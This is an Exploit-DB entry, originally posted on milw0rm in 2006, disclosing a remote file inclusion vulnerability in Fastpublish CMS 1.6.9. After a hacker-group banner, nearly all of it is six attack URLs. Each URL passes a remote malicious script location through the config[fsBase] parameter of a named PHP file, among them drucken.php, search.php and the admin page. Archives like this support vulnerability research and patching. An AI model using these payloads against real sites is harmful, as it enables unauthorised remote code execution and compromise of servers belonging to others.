Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion

EDB-ID:

1848


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2006-05-29


################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
# Script site: http://www.fastpublish.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-29]